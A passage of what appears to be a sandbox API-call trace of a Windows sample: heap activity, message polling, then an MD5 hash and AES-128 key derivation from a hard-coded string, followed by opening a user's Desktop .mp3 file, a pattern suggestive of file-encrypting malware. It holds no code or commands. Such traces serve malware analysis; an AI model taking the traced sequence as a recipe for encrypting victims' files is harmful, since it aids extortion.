Size=0x20) returned 0x8df140 [0158.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0158.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0158.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0158.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.788] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0158.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0158.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0158.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0158.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0158.788] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0158.788] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0158.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0158.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0158.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0158.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0158.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0158.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0158.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0158.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0158.789] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0158.789] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0158.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0158.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0158.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0158.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0158.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0158.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0158.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0158.790] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0158.790] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0158.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.791] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0158.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0158.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0158.791] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0158.791] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0158.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0158.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0158.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0158.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.792] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0158.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.792] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0158.792] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.793] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0158.793] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x19) returned 0x8dec90 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1a) returned 0x8dee20 [0158.793] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0158.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0158.794] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1a) returned 0x8def60 [0158.794] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x8def60, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XNGnHuBtZMP7Oc4UntiQCY9VF", lpUsedDefaultChar=0x0) returned 26 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec90 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.794] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0158.794] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0158.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0158.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0158.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0158.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0158.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0158.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0158.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0158.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0158.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0158.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0158.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0158.795] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0158.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0158.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0158.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26 [0158.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="XNGnHuBtZMP7Oc4UntiQCY9VF", cchWideChar=26, lpMultiByteStr=0x8def60, cbMultiByte=26, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="XNGnHuBtZMP7Oc4UntiQCY9VF", lpUsedDefaultChar=0x0) returned 26 [0158.795] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0158.795] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.795] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.795] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.795] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.796] CryptHashData (hHash=0x90ae18, pbData=0x8dec90, dwDataLen=0x19, dwFlags=0x1) returned 1 [0158.796] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.796] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.796] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.796] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.796] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.796] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0158.796] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0158.796] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.796] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af98) returned 1 [0158.796] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.796] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.796] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.796] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.796] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.796] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0158.796] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0158.796] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0158.796] CryptDestroyHash (hHash=0x90ae18) returned 1 [0158.796] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0158.796] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.796] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.796] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.796] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.798] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FAlaByDgBqpgWn8JbOac.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\falabydgbqpgwn8jboac.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0158.798] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.798] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0158.798] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.798] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.799] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0158.800] 